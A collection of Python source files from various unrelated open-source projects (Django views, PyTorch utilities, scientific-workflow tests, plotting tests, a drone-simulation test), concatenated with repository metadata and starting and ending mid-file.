if (filt2 == filt2 and filt1 == filt1):
data_sp = SimpleData.objects.filter(Q(scientific_name=pk1) | Q(scientific_name=pk3)) \
.filter(Q(taibif_dataset_name=pk2) | Q(taibif_dataset_name=pk4))
data_sp_month = data_sp.values('year') \
.exclude(year__isnull=True) \
.annotate(count=Count('year')) \
.order_by('-year')
chart_year = [
{
"page": 1,
"pages": 1,
"per_page": "50",
"total": 1
},
[
{
'year': x['year'],
'count': x['count']
} for x in data_sp_month
]
]
return HttpResponse(json.dumps(chart_year), content_type="application/json")
def ChartMonth(request):
if filt1 == 'hi':
species = SimpleData.objects.filter(Q(scientific_name=pk1) | Q(scientific_name=pk3))
sp_month = species.values( 'month') \
.exclude(month__isnull=True) \
.annotate(count=Count('month')) \
.order_by('-month')
chart_month = [
{
"page": 1,
"pages": 1,
"per_page": "50",
"total": 1
},
[
{
'month': x['month'],
'count': x['count']
} for x in sp_month
]
]
if filt2 == 'you':
dataset = SimpleData.objects.filter(Q(taibif_dataset_name=pk2) | Q(taibif_dataset_name=pk4))
data_month = dataset.values('month') \
.exclude(month__isnull=True) \
.annotate(count=Count('month')) \
.order_by('-month')
chart_month = [
{
"page": 1,
"pages": 1,
"per_page": "50",
"total": 1
},
[
{
'month': x['month'],
'count': x['count']
} for x in data_month
]
]
if (filt2 == filt2 and filt1 == filt1):
data_sp = SimpleData.objects.filter(Q(scientific_name=pk1) | Q(scientific_name=pk3)) \
.filter(Q(taibif_dataset_name=pk2) | Q(taibif_dataset_name=pk4))
data_sp_month = data_sp.values('month') \
.exclude(month__isnull=True) \
.annotate(count=Count('month')) \
.order_by('-month')
chart_month = [
{
"page": 1,
"pages": 1,
"per_page": "50",
"total": 1
},
[
{
'month': x['month'],
'count': x['count']
} for x in data_sp_month
]
]
return HttpResponse(json.dumps(chart_month), content_type="application/json")
| 1.890625 | 2 |
bundestagger/account/views.py | stefanw/Bundestagger | 3 | 12786834 | # -*- coding: utf-8 -*-
from django.http import Http404, HttpResponseBadRequest, HttpResponseForbidden, HttpResponseNotAllowed
from django.shortcuts import redirect
from django.contrib import messages
from bundestagger.helper.utils import is_post
from bundestagger.account.auth import logged_in
from bundestagger.account.models import User
@is_post
def logout(request):
from bundestagger.account.auth import logout as logout_func
logout_func(request)
next = "/"
if "next" in request.POST:
next = request.POST["next"]
return redirect(next)
@is_post
@logged_in
def change_username(request):
if "username" in request.POST:
user = request.bundesuser
username = request.POST["username"]
if username != user.username:
if len(username)>20:
messages.add_message(request, messages.INFO, u"Username ist zu lang")
elif len(username)==0:
messages.add_message(request, messages.INFO, u"Username ist zu kurz")
else:
uc = User.objects.filter(username=username).count()
if uc == 0:
user.username = request.POST["username"]
user.save()
request.session["bundesuser"] = user
messages.add_message(request, messages.INFO, u"Username geändert")
else:
messages.add_message(request, messages.INFO, u"Username ist schon vergeben")
next = "/"
if "next" in request.POST:
next = request.POST["next"]
return redirect(next) | 1.976563 | 2 |
sdk/python/pulumi_linode/config/vars.py | displague/pulumi-linode | 1 | 12786835 | <reponame>displague/pulumi-linode
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import json
import warnings
import pulumi
import pulumi.runtime
from .. import utilities, tables
__config__ = pulumi.Config('linode')
token = utilities.require_with_default(lambda: __config__.require('token'), utilities.get_env('LINODE_TOKEN', 'LINODE_API_TOKEN'))
"""
The token that allows you access to your Linode account
"""
ua_prefix = __config__.get('uaPrefix')
"""
An HTTP User-Agent Prefix to prepend in API requests.
"""
url = __config__.get('url')
"""
The HTTP(S) API address of the Linode API to use.
"""
| 0.933594 | 1 |
audlib/nn/util.py | RaphaelOlivier/pyaudlib | 26 | 12786836 | """Utility functions for neural networks."""
import numpy as np
import torch
def detach(states):
"""Truncate backpropagation (usually used in RNN)."""
return [state.detach() for state in states]
def hasnan(m):
"""Check if torch.tensor m have NaNs in it."""
return np.any(np.isnan(m.cpu().data.numpy()))
def printnn(model):
"""Print out neural network."""
for name, param in model.named_parameters():
if param.requires_grad:
print("{}[{}]\n{}".format('-' * 30, name, param.data.numpy()))
def numparams(model):
"""Calculate the total number of learnable parameters."""
return sum(p.numel() for p in model.parameters())
class UnpackedSequence(object):
"""Unpack a PackedSequence to original (unpadded) examples."""
def __init__(self, ps):
"""Construct an unpacked sequence object."""
self.packed_sequence = ps
lencnt = [int(n) for n in ps.batch_sizes[:-1]-ps.batch_sizes[1:]] \
+ [int(ps.batch_sizes[-1])]
self.seqlengths = [] # seqlengths[i] contains length of example i
for num, ll in zip(lencnt[::-1], range(len(lencnt), 0, -1)):
self.seqlengths.extend([ll] * num)
assert len(self.seqlengths) == self.packed_sequence.batch_sizes[0]
def __len__(self):
"""Return number of examples in this batch."""
return len(self.seqlengths)
def __getitem__(self, i):
"""Get original idx-th item in the batch."""
idx = torch.LongTensor(self.seqlengths[i])
idx[0] = i
idx[1:] = self.packed_sequence.batch_sizes[:self.seqlengths[i]-1]
ei = self.packed_sequence.data[idx.cumsum(0)] # example i
return ei
| 3.25 | 3 |
application/KitchenMagician/kitchen_magician/users/db/dummy_data.py | AsuPaul19/Kitchen-Magician | 0 | 12786837 | <reponame>AsuPaul19/Kitchen-Magician
from django.contrib.auth.models import User
from users.models import Profile
from groups.models import Group
from groups.models import GroupUser
import random
class DummyData():
def __init__(self, user_num=1):
self.user_num = user_num
self.users = self.create_dummy_users()
def create_dummy_users(self):
users = []
for i in range(self.user_num):
username = f"User{i}"
password = <PASSWORD>
email = f"{<EMAIL>"
user = User.objects.filter(username=username).first()
# create user if not exist
if not user:
# create a user
user = User.objects.create_user(username=username, password=password, email=email)
user.save()
# create the profile
default_images_folder = 'default_images/avatars/'
image_name = f"avatar-flat-{random.randint(1, 50)}.png"
user_profile = Profile.objects.create(user=user, image=default_images_folder+image_name)
print(user_profile.image)
user_profile.save()
print(f"User - {user}")
users.append(user)
return users
def create_dummy_groupuser(self):
groups = list(Group.objects.all())
l_groups = len(groups)
for user in self.users:
# random groups sample
groups_sample = random.sample(groups, l_groups//2)
for group in groups_sample:
# If not join the group, add th=o table
if not GroupUser.objects.filter(user=user, group=group).first():
group_user = GroupUser(user=user, group=group)
group_user.save()
print(f"GroupUser - {group_user}")
| 2.84375 | 3 |
slingen/src/algogen/core/algebraic_manipulation.py | danielesgit/slingen | 23 | 12786838 | <filename>slingen/src/algogen/core/algebraic_manipulation.py
from core.expression import Symbol, Matrix, Vector, \
Equal, Plus, Minus, Times, Transpose, Inverse, \
BlockedExpression, Sequence, Predicate, \
PatternDot
from core.properties import *
from core.InferenceOfProperties import *
from core.builtin_operands import Zero, Identity
from core.functional import replace_all
from core.rules_collection import simplify_rules, canonicalIO_rules
from core.rules_collection_base import canonical_rules
def to_canonical( expr ):
return replace_all( expr, canonical_rules )
def to_canonicalIO( expr ):
return replace_all( expr, canonical_rules+canonicalIO_rules )
def simplify( expr ):
return replace_all( expr, simplify_rules )
| 1.75 | 2 |
6_google_trace/VMFuzzyPrediction/experiments/ExperimentFuzzyBPNNM.py | nguyenthieu95/machine_learning | 1 | 12786839 | <filename>6_google_trace/VMFuzzyPrediction/experiments/ExperimentFuzzyBPNNM.py
from io_utils.NumLoad import *
from sklearn.cross_validation import train_test_split
from estimators.FuzzyFlow import FuzzyFlow
from utils.TrainingTestMaker import TrainingTestMaker
from scaling.ProactiveSLA import ProactiveSLA
from __init__fuzzy import *
dataset_holder = []
trainee_holder = {}
metrics = ["cpu_rate","mem_usage","disk_io_time"]
arr_desk = ['X_train','y_train','X_test']
sliding_number = 3
data = pd.read_csv('sampling_617685_metric_10min_datetime_origin.csv',parse_dates=True,index_col=0)[:3000]
def experiment(sliding_number):
for metric in metrics:
dat = pd.Series(data[metric].round(5))
fuzzy_engine = FuzzyFlow()
data_maker = TrainingTestMaker()
fuzzy_engine.fit_transform(dat)
sliding = np.array(list(SlidingWindow(fuzzy_engine.u_class_transform, sliding_number)))
X_train, y_train, X_test, y_test = data_maker.make_fuzzy_test(sliding, fuzzy_engine.u_class_transform, dat)
dataset_holder.append(fuzzy_engine)
trainee_holder[metric] = {
'X_train': X_train,
"y_train": y_train,
"X_test": X_test,
"y_test": y_test
}
y_train = np.asarray(zip(*[trainee_holder[metric]['y_train'] for metric in metrics]))
# X_test = zip(trainee_holder['cpu_rate']['X_test'],trainee_holder['mem_usage']['X_test'])
X_train = []
X_test = []
# y_train = []
for i in np.arange(len(trainee_holder['cpu_rate']['X_train'])):
# tmp = zip(trainee_holder['cpu_rate']['X_train'][i],trainee_holder['mem_usage']['X_train'][i])
tmp = zip(*[trainee_holder[metric]['X_train'][i] for metric in metrics])
X_train.append(np.ravel(tmp))
for i in np.arange(len(trainee_holder['cpu_rate']['X_test'])):
tmp = zip(*[trainee_holder[metric]['X_test'][i] for metric in metrics])
X_test.append(np.ravel(tmp))
X_train = np.array(X_train)
X_test = np.array(X_test)
classifier = KerasRegressor(hidden_nodes=[64],steps=10000,batch_size=32, activation='sigmoid',verbose=2, learning_rate=0.001)
a = classifier.fit(X_train, y_train)
y_pred = np.round(abs(classifier.predict(X_test)))
y_cpu = dataset_holder[0].inverse_transform(abs(y_pred[:, 0]))
y_ram = dataset_holder[1].inverse_transform(abs(y_pred[:, 1]))
y_disk_io = dataset_holder[1].inverse_transform(abs(y_pred[:, 2]))
score_mae_CPU = mean_absolute_error(y_cpu, trainee_holder['cpu_rate']['y_test'])
score_mae_RAM = mean_absolute_error(y_ram, trainee_holder['mem_usage']['y_test'])
score_mae_disk_io = mean_absolute_error(y_ram, trainee_holder['disk_io_time']['y_test'])
y_test = zip(trainee_holder['cpu_rate']['y_test'],trainee_holder['mem_usage']['y_test'])
np.savez('model_saved/Fuzzy_BPNNM_%s_%s' % (sliding_number, score_mae_CPU), y_pred=y_pred, y_true=y_test)
return sliding_number, score_mae_CPU, score_mae_RAM, score_mae_disk_io
result = [[experiment(sliding_number=i) for i in np.arange(2,6)] for j in np.arange(2)]
cols = ["sliding_number"]
cols.extend(metrics)
results = pd.DataFrame(np.array(result).reshape(-1,len(cols)), columns=cols)
#results.to_csv('experiment_logs/fgabpnnm_experiment.csv')
results.to_csv('experiment_logs/fuzzy_bpnn_experimentm.csv')
| 2.078125 | 2 |
ziken03/models.py | ihakiwamu/Experiment_Ryakugo | 0 | 12786840 | <filename>ziken03/models.py<gh_stars>0
# coding UTF-8
import matplotlib.pyplot as plt
from input import read_file, conv_str_to_kana, conv_kana_to_vec, conv_vec_to_kana, calc_accuracy
from sklearn import svm
from sklearn.linear_model import LinearRegression
from sklearn.model_selection import train_test_split
from sklearn.metrics import mean_absolute_error
import matplotlib.pyplot as plt
import numpy as np
import csv
import pandas as pd
from sklearn.decomposition import PCA
from sklearn.cluster import KMeans
#データ生成部
List = pd.read_csv('dataset_proto.csv')
data = read_file('dataset_proto.csv')
kana_title, kana_ans = conv_str_to_kana(data[0],data[1])
vec_title = conv_kana_to_vec_meta(kana_title,1,"T")
vec_ans = conv_kana_to_vec_meta(kana_ans,1,"R")
List1 = List.copy()
List1['Title_vec'] = vec_title
List1['Ans_vec'] = vec_ans
pca = PCA(n_components=1)
x_pca = pca.fit_transform(vec_title)
y_pca = pca.fit_transform(vec_ans)
List2 = List1.copy()
List2['X'] = x_pca
List2['Y'] = y_pca
model1 = KMeans(n_clusters=5, random_state=0)
data1_X = List2[['X','Y']]
model1.fit(data1_X)
y1 = model1.labels_
print(y1)
data_results = List2.copy()
data_results['分類結果'] = y1
data_result = data_results.sort_values('分類結果')
#データ分類部
list_title = data_results[['Title_vec']]
list_ans = data_results[['Ans_vec']]
list_title = list_title.values
list_ans = list_ans.values
num = 0
list0_title = []
list1_title = []
list2_title = []
list3_title = []
list4_title = []
list0_ans = []
list1_ans = []
list2_ans = []
list3_ans = []
list4_ans = []
list_ = data_results[['分類結果']].values
for i in list_:
if int(i) == 0:
list0_title.extend(list_title[num])
list0_ans.extend(list_ans[num])
elif int(i) == 1:
list1_title.extend(list_title[num])
list1_ans.extend(list_ans[num])
elif int(i) == 2:
list2_title.extend(list_title[num])
list2_ans.extend(list_ans[num])
elif int(i) == 3:
list3_title.extend(list_title[num])
list3_ans.extend(list_ans[num])
elif int(i) == 4:
list4_title.extend(list_title[num])
list4_ans.extend(list_ans[num])
else:
print("なんか抜けてるよ")
num += 1
#学習と予測の関数
def clustering(trainX,trainY):
X_train, X_test, Y_train, Y_test = train_test_split(vec_title, vec_ans, train_size = 0.8, test_size = 0.2, random_state = 0)
# 線形回帰に適用
lr = LinearRegression()
lr.fit(trainX,trainY)
Y_pred = lr.predict(X_test)
Y_pred = np.array(Y_pred)
Y_test = np.array(Y_test)
# 予測と正解の差異を計算
pred_diff = []
for j,title in enumerate(Y_pred):
title_diff = []
for k,val in enumerate(title):
diff = abs(val - Y_test[j,k])
title_diff.append(diff)
pred_diff.append(title_diff)
#print(mean_absolute_error(Y_test, Y_pred))
# csvに出力
with open("pred_diff.csv", "w") as file:
writer = csv.writer(file, lineterminator='\n')
writer.writerows(pred_diff)
# 0,1に変換
for title in Y_pred:
for index,i in enumerate(title):
if i<=0.2:
title[index] = 0
else:
title[index] = 1
# title[index] = round(j)
# カナに直して比較
Y_pred = Y_pred.tolist()
Y_test = Y_test.tolist()
Y_pred_kana = conv_vec_to_kana(Y_pred)
Y_test_kana = conv_vec_to_kana(Y_test)
return calc_accuracy(Y_pred_kana,Y_test_kana), Y_pred_kana, Y_test_kana
#実行部
model_listT = [list0_title, list1_title, list2_title, list3_title, list4_title]
model_listA = [list0_ans, list1_ans, list2_ans, list3_ans, list4_ans]
for i in range(5):
score, Y_pred_kana, Y_test_kana = clustering(model_listT[i], model_listA[i])
print("モデル"+str(i)+"号")
print(str(score)+"点")
"""
for x, y in enumerate(Y_pred_kana):
print(" ".join(Y_test_kana[x]))
print(" ".join(y))
print("\n")
"""
| 2.609375 | 3 |
main/lib/idds/tests/core_tests.py | HSF/iDDS | 0 | 12786841 | <gh_stars>0
import sys
import datetime
from idds.common.utils import json_dumps # noqa F401
from idds.common.constants import ContentStatus, ContentType, ContentRelationType, ContentLocking # noqa F401
from idds.core.requests import get_requests # noqa F401
from idds.core.messages import retrieve_messages # noqa F401
from idds.core.transforms import get_transforms # noqa F401
from idds.core.workprogress import get_workprogresses # noqa F401
from idds.core.processings import get_processings # noqa F401
from idds.core import transforms as core_transforms # noqa F401
from idds.orm.contents import get_input_contents
from idds.core.transforms import release_inputs_by_collection, release_inputs_by_collection_old # noqa F401
def release_inputs_test():
to_release_inputs = {3498: [{'map_id': 1, 'status': ContentStatus.Available, 'retries': 0, 'scope': 'pseudo_dataset',
'substatus': ContentStatus.Available, 'path': None,
'name': 'u_jchiang_dark_12781_panda_20210712T222923Z.qgraph+3_isr_3020111900038_94+qgraphNodeId:3+qgraphId:1626129062.5744567-119392',
'content_id': 2248918, 'min_id': 0, 'bytes': 1, 'coll_id': 3498, 'max_id': 1, 'md5': None,
'request_id': 93, 'content_type': ContentType.File, 'adler32': '12345678',
'workload_id': 1626129080, 'content_relation_type': ContentRelationType.Output,
'processing_id': None, 'content_metadata': {'events': 1, 'panda_id': 1411522}, 'transform_id': 1749, 'storage_id': None},
{'map_id': 2, 'status': ContentStatus.Available, 'retries': 0, 'scope': 'pseudo_dataset',
'substatus': ContentStatus.Available, 'path': None,
'name': 'u_jchiang_dark_12781_panda_20210712T222923Z.qgraph+2_isr_3020111900032_94+qgraphNodeId:2+qgraphId:1626129062.5744567-119392',
'content_id': 2248919, 'min_id': 0, 'bytes': 1, 'coll_id': 3498, 'max_id': 1, 'md5': None,
'request_id': 93, 'content_type': ContentType.File, 'adler32': '12345678',
'workload_id': 1626129080, 'content_relation_type': ContentRelationType.Output,
'processing_id': None, 'content_metadata': {'events': 1, 'panda_id': 1411523}, 'transform_id': 1749, 'storage_id': None},
{'map_id': 3, 'status': ContentStatus.Available, 'retries': 0, 'scope': 'pseudo_dataset',
'substatus': ContentStatus.Available, 'path': None,
'name': 'u_jchiang_dark_12781_panda_20210712T222923Z.qgraph+4_isr_3020111900040_94+qgraphNodeId:4+qgraphId:1626129062.5744567-119392',
'content_id': 2248920, 'min_id': 0, 'bytes': 1, 'coll_id': 3498, 'max_id': 1, 'md5': None,
'request_id': 93, 'content_type': ContentType.File, 'adler32': '12345678',
'workload_id': 1626129080, 'content_relation_type': ContentRelationType.Output,
'processing_id': None, 'content_metadata': {'events': 1, 'panda_id': 1411524}, 'transform_id': 1749, 'storage_id': None},
{'map_id': 4, 'status': ContentStatus.Available, 'retries': 0, 'scope': 'pseudo_dataset',
'substatus': ContentStatus.Available, 'path': None,
'name': 'u_jchiang_dark_12781_panda_20210712T222923Z.qgraph+1_isr_3020111900036_94+qgraphNodeId:1+qgraphId:1626129062.5744567-119392',
'content_id': 2248921, 'min_id': 0, 'bytes': 1, 'coll_id': 3498, 'max_id': 1, 'md5': None,
'request_id': 93, 'content_type': ContentType.File, 'adler32': '12345678',
'workload_id': 1626129080, 'content_relation_type': ContentRelationType.Output,
'processing_id': None, 'content_metadata': {'events': 1, 'panda_id': 1411525}, 'transform_id': 1749, 'storage_id': None},
{'map_id': 5, 'status': ContentStatus.Available, 'retries': 0, 'scope': 'pseudo_dataset',
'substatus': ContentStatus.Available, 'path': None,
'name': 'u_jchiang_dark_12781_panda_20210712T222923Z.qgraph+0_isr_3020111900034_94+qgraphNodeId:0+qgraphId:1626129062.5744567-119392',
'content_id': 2248922, 'min_id': 0, 'bytes': 1, 'coll_id': 3498, 'max_id': 1, 'md5': None,
'request_id': 93, 'content_type': ContentType.File, 'adler32': '12345678',
'workload_id': 1626129080, 'content_relation_type': ContentRelationType.Output,
'processing_id': None, 'content_metadata': {'events': 1, 'panda_id': 1411526}, 'transform_id': 1749, 'storage_id': None}
]}
to_release_inputs = {4042: [{'map_id': 1, 'status': ContentStatus.Available, 'retries': 0, 'scope': 'pseudo_dataset', 'substatus': ContentStatus.Available, 'path': None, 'name': 'u_huanlin_panda_test_ci_imsim_w26_20210714T214732Z.qgraph+13_isr_257768_161+1626299263.3909254-24148+13', 'locking': ContentLocking.Idle, 'created_at': datetime.datetime(2021, 7, 14, 21, 48, 10), 'content_id': 2254913, 'min_id': 0, 'bytes': 1, 'updated_at': datetime.datetime(2021, 7, 14, 22, 8, 30), 'coll_id': 4042, 'max_id': 1, 'md5': None, 'accessed_at': datetime.datetime(2021, 7, 14, 22, 8, 30), 'request_id': 107, 'content_type': ContentType.File, 'adler32': '12345678', 'expired_at': datetime.datetime(2021, 8, 13, 21, 48, 10), 'workload_id': 1626299273, 'content_relation_type': ContentRelationType.Output, 'processing_id': None, 'content_metadata': {'events': 1, 'panda_id': 1412272}, 'transform_id': 2021, 'storage_id': None}, # noqa E501
{'map_id': 2, 'status': ContentStatus.Available, 'retries': 0, 'scope': 'pseudo_dataset', 'substatus': ContentStatus.Available, 'path': None, 'name': 'u_huanlin_panda_test_ci_imsim_w26_20210714T214732Z.qgraph+2_isr_212071_54+1626299263.3909254-24148+2', 'locking': ContentLocking.Idle, 'created_at': datetime.datetime(2021, 7, 14, 21, 48, 10), 'content_id': 2254914, 'min_id': 0, 'bytes': 1, 'updated_at': datetime.datetime(2021, 7, 14, 22, 8, 30), 'coll_id': 4042, 'max_id': 1, 'md5': None, 'accessed_at': datetime.datetime(2021, 7, 14, 22, 8, 30), 'request_id': 107, 'content_type': ContentType.File, 'adler32': '12345678', 'expired_at': datetime.datetime(2021, 8, 13, 21, 48, 10), 'workload_id': 1626299273, 'content_relation_type': ContentRelationType.Output, 'processing_id': None, 'content_metadata': {'events': 1, 'panda_id': 1412273}, 'transform_id': 2021, 'storage_id': None}, # noqa E501
{'map_id': 3, 'status': ContentStatus.Available, 'retries': 0, 'scope': 'pseudo_dataset', 'substatus': ContentStatus.Available, 'path': None, 'name': 'u_huanlin_panda_test_ci_imsim_w26_20210714T214732Z.qgraph+10_isr_456716_99+1626299263.3909254-24148+10', 'locking': ContentLocking.Idle, 'created_at': datetime.datetime(2021, 7, 14, 21, 48, 10), 'content_id': 2254915, 'min_id': 0, 'bytes': 1, 'updated_at': datetime.datetime(2021, 7, 14, 22, 8, 30), 'coll_id': 4042, 'max_id': 1, 'md5': None, 'accessed_at': datetime.datetime(2021, 7, 14, 22, 8, 30), 'request_id': 107, 'content_type': ContentType.File, 'adler32': '12345678', 'expired_at': datetime.datetime(2021, 8, 13, 21, 48, 10), 'workload_id': 1626299273, 'content_relation_type': ContentRelationType.Output, 'processing_id': None, 'content_metadata': {'events': 1, 'panda_id': 1412274}, 'transform_id': 2021, 'storage_id': None}, # noqa E501
{'map_id': 4, 'status': ContentStatus.Available, 'retries': 0, 'scope': 'pseudo_dataset', 'substatus': ContentStatus.Available, 'path': None, 'name': 'u_huanlin_panda_test_ci_imsim_w26_20210714T214732Z.qgraph+34_isr_407919_130+1626299263.3909254-24148+34', 'locking': ContentLocking.Idle, 'created_at': datetime.datetime(2021, 7, 14, 21, 48, 10), 'content_id': 2254916, 'min_id': 0, 'bytes': 1, 'updated_at': datetime.datetime(2021, 7, 14, 22, 8, 30), 'coll_id': 4042, 'max_id': 1, 'md5': None, 'accessed_at': datetime.datetime(2021, 7, 14, 22, 8, 30), 'request_id': 107, 'content_type': ContentType.File, 'adler32': '12345678', 'expired_at': datetime.datetime(2021, 8, 13, 21, 48, 10), 'workload_id': 1626299273, 'content_relation_type': ContentRelationType.Output, 'processing_id': None, 'content_metadata': {'events': 1, 'panda_id': 1412275}, 'transform_id': 2021, 'storage_id': None}, # noqa E501
{'map_id': 5, 'status': ContentStatus.Available, 'retries': 0, 'scope': 'pseudo_dataset', 'substatus': ContentStatus.Available, 'path': None, 'name': 'u_huanlin_panda_test_ci_imsim_w26_20210714T214732Z.qgraph+23_isr_254379_48+1626299263.3909254-24148+23', 'locking': ContentLocking.Idle, 'created_at': datetime.datetime(2021, 7, 14, 21, 48, 10), 'content_id': 2254917, 'min_id': 0, 'bytes': 1, 'updated_at': datetime.datetime(2021, 7, 14, 22, 8, 30), 'coll_id': 4042, 'max_id': 1, 'md5': None, 'accessed_at': datetime.datetime(2021, 7, 14, 22, 8, 30), 'request_id': 107, 'content_type': ContentType.File, 'adler32': '12345678', 'expired_at': datetime.datetime(2021, 8, 13, 21, 48, 10), 'workload_id': 1626299273, 'content_relation_type': ContentRelationType.Output, 'processing_id': None, 'content_metadata': {'events': 1, 'panda_id': 1412276}, 'transform_id': 2021, 'storage_id': None}, # noqa E501
{'map_id': 6, 'status': ContentStatus.Available, 'retries': 0, 'scope': 'pseudo_dataset', 'substatus': ContentStatus.Available, 'path': None, 'name': 'u_huanlin_panda_test_ci_imsim_w26_20210714T214732Z.qgraph+11_isr_37657_141+1626299263.3909254-24148+11', 'locking': ContentLocking.Idle, 'created_at': datetime.datetime(2021, 7, 14, 21, 48, 10), 'content_id': 2254918, 'min_id': 0, 'bytes': 1, 'updated_at': datetime.datetime(2021, 7, 14, 22, 8, 30), 'coll_id': 4042, 'max_id': 1, 'md5': None, 'accessed_at': datetime.datetime(2021, 7, 14, 22, 8, 30), 'request_id': 107, 'content_type': ContentType.File, 'adler32': '12345678', 'expired_at': datetime.datetime(2021, 8, 13, 21, 48, 10), 'workload_id': 1626299273, 'content_relation_type': ContentRelationType.Output, 'processing_id': None, 'content_metadata': {'events': 1, 'panda_id': 1412277}, 'transform_id': 2021, 'storage_id': None}, # noqa E501
{'map_id': 7, 'status': ContentStatus.Available, 'retries': 0, 'scope': 'pseudo_dataset', 'substatus': ContentStatus.Available, 'path': None, 'name': 'u_huanlin_panda_test_ci_imsim_w26_20210714T214732Z.qgraph+31_isr_226983_36+1626299263.3909254-24148+31', 'locking': ContentLocking.Idle, 'created_at': datetime.datetime(2021, 7, 14, 21, 48, 10), 'content_id': 2254919, 'min_id': 0, 'bytes': 1, 'updated_at': datetime.datetime(2021, 7, 14, 22, 8, 30), 'coll_id': 4042, 'max_id': 1, 'md5': None, 'accessed_at': datetime.datetime(2021, 7, 14, 22, 8, 30), 'request_id': 107, 'content_type': ContentType.File, 'adler32': '12345678', 'expired_at': datetime.datetime(2021, 8, 13, 21, 48, 10), 'workload_id': 1626299273, 'content_relation_type': ContentRelationType.Output, 'processing_id': None, 'content_metadata': {'events': 1, 'panda_id': 1412278}, 'transform_id': 2021, 'storage_id': None}]} # noqa E501
for coll_id in to_release_inputs:
contents = get_input_contents(request_id=to_release_inputs[coll_id][0]['request_id'],
coll_id=coll_id,
name=None)
print(len(contents))
in_dep_contents = []
for content in contents:
if (content['content_relation_type'] == ContentRelationType.InputDependency):
in_dep_contents.append(content)
print(len(in_dep_contents))
update_contents = release_inputs_by_collection(to_release_inputs)
print(update_contents)
update_contents = release_inputs_by_collection(to_release_inputs, final=True)
print(update_contents)
# release_inputs_test()
def show_works(req):
workflow = req['processing_metadata']['workflow']
print(workflow.independent_works)
print(len(workflow.independent_works))
print(workflow.works_template.keys())
print(len(workflow.works_template.keys()))
print(workflow.work_sequence.keys())
print(len(workflow.work_sequence.keys()))
print(workflow.works.keys())
print(len(workflow.works.keys()))
work_ids = []
for i_id in workflow.works:
work = workflow.works[i_id]
print(i_id)
print(work.work_name)
print(work.task_name)
print(work.work_id)
work_ids.append(work.work_id)
print(work_ids)
reqs = get_requests(request_id=229, with_detail=True, with_metadata=True)
for req in reqs:
# print(req['request_id'])
# print(rets)
# print(json_dumps(req, sort_keys=True, indent=4))
# show_works(req)
pass
# sys.exit(0)
"""
# reqs = get_requests()
# print(len(reqs))
for req in reqs:
if req['request_id'] == 113:
# print(req)
# print(req['request_metadata']['workflow'].to_dict())
# print(json_dumps(req, sort_keys=True, indent=4))
pass
sys.exit(0)
"""
tfs = get_transforms(request_id=230)
for tf in tfs:
# print(tf)
# print(tf['transform_metadata']['work'].to_dict())
print(json_dumps(tf, sort_keys=True, indent=4))
pass
sys.exit(0)
"""
msgs = retrieve_messages(workload_id=25972557)
number_contents = 0
for msg in msgs:
# if msg['msg_id'] in [323720]:
# if True:
# if msg['request_id'] in [208]:
print(json_dumps(msg['msg_content'], sort_keys=True, indent=4))
if msg['msg_content']['msg_type'] == 'file_stagein' and msg['msg_content']['relation_type'] == 'output':
# number_contents += len(msg['msg_content']['files'])
for i_file in msg['msg_content']['files']:
if i_file['status'] == 'Available':
number_contents += 1
pass
print(number_contents)
sys.exit(0)
"""
prs = get_processings(request_id=219)
i = 0
for pr in prs:
# if pr['request_id'] == 91:
print("processing_number: %s" % i)
i += 1
print(json_dumps(pr, sort_keys=True, indent=4))
pass
sys.exit(0)
to_release_inputs = [{'request_id': 248,
'coll_id': 3425,
'name': 'shared_pipecheck_20210407T110240Z.qgraph',
'status': ContentStatus.Available,
'substatus': ContentStatus.Available}]
# updated_contents = core_transforms.release_inputs(to_release_inputs)
# print(updated_contents)
| 1.695313 | 2 |
tests/test_config.py | contourpy/contourpy | 14 | 12786842 | from image_comparison import compare_images
import pytest
import util_config
import util_test
@pytest.mark.parametrize("name", util_test.all_names())
def test_config_filled(name):
config = util_config.ConfigFilled(name)
image_buffer = config.save_to_buffer()
compare_images(image_buffer, "config_filled.png", name)
@pytest.mark.parametrize("name", util_test.quad_as_tri_names())
def test_config_filled_quad_as_tri(name):
config = util_config.ConfigFilled(name, quad_as_tri=True)
image_buffer = config.save_to_buffer()
compare_images(image_buffer, "config_filled_quad_as_tri.png", name)
@pytest.mark.parametrize("name", util_test.corner_mask_names())
def test_config_filled_corner(name):
config = util_config.ConfigFilledCorner(name)
image_buffer = config.save_to_buffer()
compare_images(image_buffer, "config_filled_corner.png", name)
@pytest.mark.parametrize("name", util_test.all_names())
def test_config_lines(name):
if name == "mpl2005":
pytest.skip() # Line directions are not consistent.
config = util_config.ConfigLines(name)
image_buffer = config.save_to_buffer()
compare_images(image_buffer, "config_lines.png", name)
@pytest.mark.parametrize("name", util_test.quad_as_tri_names())
def test_config_lines_quad_as_tri(name):
config = util_config.ConfigLines(name, quad_as_tri=True)
image_buffer = config.save_to_buffer()
compare_images(image_buffer, "config_lines_quad_as_tri.png", name)
@pytest.mark.parametrize("name", util_test.corner_mask_names())
def test_config_lines_corner(name):
config = util_config.ConfigLinesCorner(name)
image_buffer = config.save_to_buffer()
compare_images(image_buffer, "config_lines_corner.png", name)
| 2.15625 | 2 |
src/sentry/web/frontend/organization_avatar.py | AlexWayfer/sentry | 4 | 12786843 | <gh_stars>1-10
from __future__ import absolute_import
from sentry.models import OrganizationAvatar
from sentry.web.frontend.base import AvatarPhotoView
class OrganizationAvatarPhotoView(AvatarPhotoView):
model = OrganizationAvatar
| 1.390625 | 1 |
dronedirector/tests/test_aerial.py | avmarchenko/dronedirector | 0 | 12786844 | # -*- coding: utf-8 -*-
# Copyright 2018 <NAME>
# Distributed under the terms of the Apache License 2.0
"""
Test Aerial Objects
#####################
"""
import six
import json
import uuid
import numpy as np
from itertools import cycle
from dronedirector.aerial import AerialObject, Drone, SinusoidalDrone
class CaliRedwood(AerialObject):
"""Example of subclassing."""
def __init__(self):
super(CaliRedwood, self).__init__(altitude=cycle([100.0]),
latitude=cycle([37.8716]),
longitude=cycle([-122.2727]))
def test_simple_aerial():
"""Test making a simple object on-the-fly."""
tree = AerialObject(altitude=cycle([100.0]),
latitude=cycle([37.8716]),
longitude=cycle([-122.2727]))
msg = tree.message()
assert isinstance(msg, six.string_types)
assert isinstance(json.loads(msg), dict)
def test_subclassing_ao():
"""Test subclassing :class:`~dronedirector.aerial.AerialObject`."""
tree = CaliRedwood()
msg = json.loads(tree.message()) # Tests for valid json
assert isinstance(msg, dict)
assert np.isclose(msg['altitude'], 100.0)
def test_drone():
"""Test basic drone creation."""
uid = uuid.uuid4()
